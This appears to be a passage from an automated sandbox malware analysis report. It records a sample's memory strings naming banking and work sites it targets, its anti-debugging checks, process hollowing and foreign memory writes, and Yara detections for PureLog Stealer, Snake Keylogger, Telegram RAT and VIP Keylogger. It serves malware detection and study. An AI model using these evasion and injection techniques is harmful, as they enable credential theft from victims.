Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: npratlsN.pif, 00000011.00000002.3855219862.0000000029764000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: npratlsN.pif, 00000011.00000002.3855219862.00000000297BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\SysWOW64\brightness.exe	API call chain: ExitProcess graph end node	graph_7-30983
Source: C:\Users\Public\Libraries\npratlsN.pif	API call chain: ExitProcess graph end node	graph_13-80374
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\npratlsN.pif	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0279FA38 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

7_2_0279FA38

Source: C:\Windows\SysWOW64\brightness.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process queried: DebugPort

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 13_2_209C7A28 LdrInitializeThunk,

13_2_209C7A28

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_0040CE09

Source: C:\Users\Public\Libraries\npratlsN.pif

13_2_004019F0

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02798818 LoadLibraryW,GetProcAddress,FreeLibrary,

7_2_02798818

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 13_2_0040ADB0 GetProcessHeap,HeapFree,

13_2_0040ADB0

Source: C:\Users\Public\Libraries\npratlsN.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040CE09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0040E61C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_00416F6A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_004123F1 SetUnhandledExceptionFilter,	13_2_004123F1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_1_0040CE09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_1_0040E61C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_1_00416F6A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_1_004123F1 SetUnhandledExceptionFilter,	13_1_004123F1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_0040CE09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_0040E61C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00416F6A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 15_2_004123F1 SetUnhandledExceptionFilter,	15_2_004123F1

Source: C:\Users\Public\Libraries\npratlsN.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\brightness.exe	Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\brightness.exe	Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\brightness.exe	Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 21F008	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 3C4008
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 386008

Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif

Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	7_2_02785ACC
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	7_2_0278A7C4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	7_2_02785BD8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	7_2_0278A810
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: GetLocaleInfoA,	13_2_00417A20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: GetLocaleInfoA,	13_1_00417A20
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	14_2_02815ACC
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	14_2_02815BD7
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: GetLocaleInfoA,	14_2_0281A810
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: GetLocaleInfoA,	15_2_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\npratlsN.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0278920C GetLocalTime,

7_2_0278920C

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0278B78C GetVersionExA,

7_2_0278B78C

Source: C:\Users\Public\Libraries\npratlsN.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3857060736.000000002E981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3853601584.000000002D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CB71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3864457533.00000000304B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 7716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: npratlsN.pif PID: 8188, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1f7f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2812a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7ca8ee.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.304b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE
